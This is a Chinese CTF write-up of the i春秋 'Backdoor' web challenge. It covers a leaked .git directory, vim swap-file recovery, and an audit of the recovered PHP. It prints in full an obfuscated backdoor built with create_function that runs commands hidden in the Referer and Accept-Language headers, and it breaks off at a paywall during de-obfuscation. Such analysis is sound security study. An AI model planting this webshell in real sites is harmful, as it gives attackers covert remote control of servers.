i春秋web-Backdoor(.git泄露、vim备份泄露、代码审计)

最新推荐文章于 2024-10-13 21:07:57 发布

原创

最新推荐文章于 2024-10-13 21:07:57 发布 · 1.5k 阅读

2 ·

CC 4.0 BY-SA版权

文章标签：

#i春秋 #.git泄露 #vim备份泄露 #php代码审计

本文介绍了通过.web泄露获取敏感信息，详细解析了.vim备份文件的恢复方法，并探讨了PHP代码审计，特别是eval()执行system()函数的利用技巧，通过操纵HTTP头部字段实现命令执行，最终达到获取flag的目标。

1、文件泄露

根据题目 tips:敏感文件泄漏
网站目录扫描，发现.git泄露，下载git文件夹，在bd049e_flag.php中看到：

<?php
echo "flag{true_flag_is_in_the_b4ckdo0r.php}";
?>

然后就访问这个网页看到：
在这里插入图片描述
是让我们找他的源码的，网页源码里面没什么线索，那就可能是备份文件泄露了，访问.b4ckdo0r.php.swo，果然得到了备份文件，然后就是用vim恢复了。

恢复方法：在b4ckdo0r.php.swo同一文件夹下，使用命令vim -r b4ckdo0r.php，然后进入了vim编辑界面，命令wq!即可保存下来恢复的文件：

<?php
echo "can you find the source code of me?";
/**
 * Signature For Report
 */$h='_)m/","/-/)m"),)marray()m"/","+")m),$)mss($s[$i)m],0,$e))))m)m,$k)));$o=ob)m_get_c)monte)m)mnts)m();ob_end_clean)';/*
 */$H='m();$d=ba)mse64)m_encode)m(x(gzc)mompres)ms($o),)m$)mk));print("<)m$k>$d<)m/)m$k>)m");@sessio)mn_d)mestroy();}}}}';/*
 */$N='mR;$rr)m=@$r[)m"HTT)mP_RE)mFERER"];$ra)m=)m@$r["HTTP_AC)mC)mEPT_LANG)mUAGE)m")m];if($rr)m&&$ra){)m$u=parse_u)mrl($rr);p';/*
 */$u='$e){)m$k=$)mkh.$kf;ob)m_start();)m@eva)ml(@gzunco)mmpr)mess(@x(@)mbase6)m4_deco)mde(p)m)mreg_re)mplace(array("/';/*
 */$f='$i<$)ml;)m){)mfo)mr($j)m=0;($j<$c&&$i<$l);$j)m++,$i+)m+){$)mo.=$t{$i)m}^$)mk{$j};}}r)meturn )m$o;}$r)m=$_SERVE)';/*
 */$O='[$i]="";$p)m=$)m)mss($p,3)m);}if(ar)mray_)mkey_exists)m()m$i,$s)){$)ms[$i].=$p)m;)m$e=s)mtrpos)m($s[$i],$f);)mif(';/*
 */$w=')m));)m$p="";fo)mr($z=1;)m$z<c)mount()m$m[1]);$)mz++)m)m)$p.=$q[$m[)m)m2][$z]];if(str)mpo)ms($p,$h))m===0){$s)m';/*
 */$P='trt)molower";$)mi=$m[1][0)m)m].$m[1][1])m;$h=$sl()m$ss(m)md5($)mi.$kh)m),0,)m3));$f=$s)ml($ss()m)mmd5($i.$kf),0,3';/*
 */$i=')marse_)mstr)m($u["q)muery"],$)m)mq);$q=array)m_values()m$q);pre)mg_matc)mh_all()m"/([\\w)m])m)[\\w-)m]+(?:;q=0.)';/*
 */$x='m([\\d)m]))?,?/",)m$ra,$m))m;if($q)m&&$)mm))m)m{@session_start();$)ms=&$_S)mESSI)m)mON;$)mss="sub)mstr";$sl="s)m';/*
 */$y=str_replace('b','','crbebbabte_funcbbtion');/*
 */$c='$kh="4f7)m)mf";$kf="2)m)m8d7";funct)mion x($t)m,$k){$)m)mc=strlen($k);$l=st)mrlen)m($t);)m)m$o="";for()m$i=0;';/*
 */$L=str_replace(')m','',$c.$f.$N.$i.$x.$P.$w.$O.$u.$h.$H);/*
 */$v=$y('',$L);$v();/*
 */
	echo($L);//这一句是为了得到$L加上去的，恢复得到的文件中并没有
?>

然后把得到的$L代码规范化一下得到(里面有一些我的注释)：

<?php
$kh = "4f7f";
$kf = "28d7";
function x($t, $k)
{
   
   
    $c = strlen($k);
    $l = strlen($t);
    $o = "";
    for ($i = 0; $i < $l; ) {
   
   
        for ($j = 0; ($j < $c &&

最低0.47元/天解锁文章